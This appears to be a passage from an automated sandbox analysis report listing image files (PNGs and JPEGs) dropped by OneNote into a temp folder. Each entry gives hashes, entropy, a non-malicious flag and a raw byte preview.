                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11886
                                                                                                                                                                                                                  Entropy (8bit):7.946442244439929
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                                                                                                                                  MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                                                                                                                                  SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                                                                                                                                  SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                                                                                                                                  SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{C91A4277-C3B2-4F75-8DDA-208D72EFB697}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2232
                                                                                                                                                                                                                  Entropy (8bit):7.837610270261933
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                                                                                                                                  MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                                                                                                                                  SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                                                                                                                                  SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                                                                                                                                  SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{CABE65C0-4C48-4FED-AC4A-4021C1888419}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 77 x 627, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):5136
                                                                                                                                                                                                                  Entropy (8bit):7.622045262603241
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:djzuNKb3XHco17p2wolIxIx7lpskdsC/ddWNKeabJbMojpxLDTu1:VzuNKb397pwlIxKp7qs3bJb5FBTw
                                                                                                                                                                                                                  MD5:FA38AFA965141EA3F17863EE8DCCDE61
                                                                                                                                                                                                                  SHA1:2B4611E651AF7549C1AA73932B1136B561A7602F
                                                                                                                                                                                                                  SHA-256:E1CB1A0EC9BE62D5445C73AA84DF38234002A7E164EE830C9DF24997802CB5D2
                                                                                                                                                                                                                  SHA-512:A372674F5CA343321BA9C413D346070709F7685706C9C6C3DC7F61846B59253A5E6FE800DBA10AE870FD3887439B2AA106FBBB51751E92A163938A4393C43E28
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...M...s.....}8nv....PLTE.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................z`.....tRNS...................................................................................................................................................................................

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{CB2B11A4-7D6C-48F0-853E-14AF7BD15EF9}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):22634
                                                                                                                                                                                                                  Entropy (8bit):7.974332204835705
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                                                                                                                                  MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                                                                                                                                  SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                                                                                                                                  SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                                                                                                                                  SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{CB890F05-306D-429A-A78F-343A9C2BE620}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2270
                                                                                                                                                                                                                  Entropy (8bit):7.845368393313232
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                                                                                                                                  MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                                                                                                                                  SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                                                                                                                                  SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                                                                                                                                  SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{CD6B9975-BE01-441E-82B5-8510D1A4763A}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{CD751F52-59AC-45E5-9223-DD3B65479C72}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 40 x 623, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1569
                                                                                                                                                                                                                  Entropy (8bit):7.583832946136897
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:KArPoy/sSfmBL0EGEsRgeTLLXFnViAAEslVorlP0i8OmO57EnGAkYelBKMN:9oQPTgeL5ViAe8rQs7HAkrlc+
                                                                                                                                                                                                                  MD5:07DB3F43DE7C1392C67802E74707DAA6
                                                                                                                                                                                                                  SHA1:C173ADB1999065C5E1E6DBEF934B4D4D7AF0CC23
                                                                                                                                                                                                                  SHA-256:51E05999A1C9F17DF28CB474E57DD8E64BDAB824874A532C20A23766A01F8967
                                                                                                                                                                                                                  SHA-512:E509255519D4E521E82332FF418DD5A6BBBC8476399A0D9C3D81542C1CABA535B2D79E5BC90F73F9EE8468643302137671934ABD600FC696F16161C91FEAC111
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...(...o.....>.c.....PLTE................................................................................................................................................................................................a.o.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.Y.. ..........}%.../].`<..y....V...m.....<....)..;Ki..'9...2.:.c...t..V..d.t;-y.Z.=K>B.."{Lj.~G..|..ENC.!Sw,....";.p..g....E.B..S.-...k..P."..E......l[./D.-.....Q+.G<>.+..b...#..y(...{a.M..J...<....v.W..F.qm.`.....(.mk.nX....l.Px8.0\Z....7G...$*.....&..Z.VJ.~......J.2|...2H..../...=.)q....ZT" .,%..h.p....Z$.!........r...Hh.f. ....P .d..1d....2.3h....;.A.... ....d..g4...A..^.....2.ew..."h...y/..j.h..B.......%.2.%..{r...+dG.=9h....P1...A...c...^h.]Q0.8x....q .!3....ZW"Z.!3...G.vC.GG..".&..X!3.|xB..V.P!.+zS..NX!3.....Nh.y(.Z.1.h..B...Z+....l8Xcu.B...K...@U..@Q...mB...x...&L C....mB.....@kC...Y.,.... ..e\F.B..........y..e\..:$(....Z.a...yn...f..z.~Q.{o...].ln.r....^.@.{..c.7..{...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{CDE6E470-5E64-498C-B15B-CDB8BFF16920}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):15740
                                                                                                                                                                                                                  Entropy (8bit):6.0674556182683945
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:Elv3GG8/OOs+GouFdxMlxjoPyerzkpuOo2vPMc62PaJseZC+BJoS/:EtNiwdxMlZoPhzkpuOo2PMc6rX8+B6+
                                                                                                                                                                                                                  MD5:FFA5EC40DC9A0FD10EB9E6355142D6A6
                                                                                                                                                                                                                  SHA1:3D3D6A7E086B3C610C08F1F3E3F883604F06F2A4
                                                                                                                                                                                                                  SHA-256:D74C3973C8D1F7C77274691AFB1AA934940674341D7EEE563BE75E563281BDFD
                                                                                                                                                                                                                  SHA-512:6FAF2A24D06E6008F3579C7CEC90C2887462BDF83FAD7372FBB74B8DE90340B580E9836F309B68A9794597A598F7DCDA661C9A58DA6D8187C69083B7A17C9CD9
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!.1.....AQ..aq.g..8...."r....2.FG..#.E..7.Rb..Cc..D.v.B..3s..$d.%5Uu..&6fW'w........................!....1Aa...d..5e.6.q...Q..."2b.c..r3DE..BRs4U.#C.S.T............?...u.&0...cV.T.I...1..=4....Ce_.g.q.=F.M:>)...k..pm..h..=........S....)Ja8x...b.).=5.q..0......k.M.....1?-.G.b&.5..Ep.8t...'...R)..ta.F$bXO]tW.b.6#.t.XWN..ZW......].....G....x&&f..'L.....7...\...'.8...~`.sa...............................................X........qo...SMk...'.V...i..hb.}&?/.k.:>l.^....>Y...<}...&.jY.Gn.MKejyV......D......gf.0....t.nw..XQ...H.B.....=8.UkR.....Hm..w..]...k...#Z...F../.gjWvf.....w.aZ].2..5..^...VZv..._.7..a.|...:.B...,f...............~....m.;_.....-.e.y.w.[m.].bu.b.f+.E++\.....Y..7

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{CDFDDB33-15AC-4132-9D3D-2926F0CF9E1F}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11886
                                                                                                                                                                                                                  Entropy (8bit):7.946442244439929
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                                                                                                                                  MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                                                                                                                                  SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                                                                                                                                  SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                                                                                                                                  SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{CE56AADB-3800-4529-A20B-D3A652BA4BF6}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):60924
                                                                                                                                                                                                                  Entropy (8bit):7.758472758205366
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:kU7O7+CFqO6DkxTgPzo2wqggrrX8QvN1I/ZLBttB9+dPFXbc:hVuqJDaTqo2wq1L84N1I/Z1tT9X
                                                                                                                                                                                                                  MD5:D58C51D2CF586A5E14A9EC8529C3B0A8
                                                                                                                                                                                                                  SHA1:F4811A353797C29B1E3F5A61B125C46E1534D587
                                                                                                                                                                                                                  SHA-256:F927C7825851974A2149868146970706523A49165133CEE6027A43E8C9ABDF27
                                                                                                                                                                                                                  SHA-512:34B963173AFBDF07432F4B983D29F10376E4771FE666E9D50B1A81DA0B9F6001FD86B4A08B9711386DE153BF6E03C8E932E2D181C8EAF94EFF34D20FCA7570E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d................................................................................................!1AQ.aq....".....2B...Rbr#.s.4...3$.5u.6v..CSc...DT..f..t..&F........................!1..A.Qaq....."2....B.s....Rbr..#4...35...CSc.$...DTdt..%..............?....O<......X.O.Fg..{.W&u.u.T~.|r;g!.._X..N.p.4.........................................................yK..xd...6..|%....\j..e.=...Y..f..I.|-....e...$R.j.......~.W#....{.....V.k.|F..z^..:.~..f......"x.....L..K..r../.;..[..l...;.U...W...X.........8.....y?..B...m.......j..Q.g3..G.K....GL.o..n7a..Y..[.'.........x........\......~...f...0\Wc.n?k.|.....1.ww;..2..?...r4uF.MXdB6..W..mG2NJ.E........u...2.q...Z..=(l)jU.X...U.\X.......O<......X.O.Fg..{.W&u.u.T~.|r;g!.._X..N.p.4.......................................................

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{CEA2E23B-44E2-4534-953F-CA180092A728}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):8184
                                                                                                                                                                                                                  Entropy (8bit):7.807848176906598
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                                                                                                                                  MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                                                                                                                                  SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                                                                                                                                  SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                                                                                                                                  SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{CEEB4A9C-29A6-4772-967D-B6B777F753FA}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:27:10], progressive, precision 8, 102x792, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):52912
                                                                                                                                                                                                                  Entropy (8bit):7.679147474806877
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:DB/nIviNJD9C8kfJj6TkVr4q24FsUpjPc021si:DdnIvi3D9C8Cl6Dq24ayPCz
                                                                                                                                                                                                                  MD5:1122BF4C2A42B4FA7F29D3C94954A7C9
                                                                                                                                                                                                                  SHA1:3750077A830FE21735A43ABD35C63BA9A4D4B0DE
                                                                                                                                                                                                                  SHA-256:423B0DD1A93B391D15B1DC8D8757C3BF5725FF2E7A59E6E3140033E2876B67F6
                                                                                                                                                                                                                  SHA-512:4626EFE2EDED2361D6296B57F994DC434CC9D02357A8A6A67D84A544FB8A1CFE0005EA98F846AB963BED7F2B6CE96BC9181182C9459843A52A98D3A731A4FE73
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:27:10............................f.........................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....]+\.9.9.P.d..Z.?~>.-...]6=....*.......S.9G...b<$..Z..........>.v.o:.o%.e...z.F`...[.wo..z.....k..E...5....G..7.......c2..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{CF98E5ED-59E7-4F5D-8F89-A9D37B4DC984}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3679
                                                                                                                                                                                                                  Entropy (8bit):7.931319059366604
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                                                                                                                                  MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                                                                                                                                  SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                                                                                                                                  SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                                                                                                                                  SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                                                                                                                                  Malicious:false
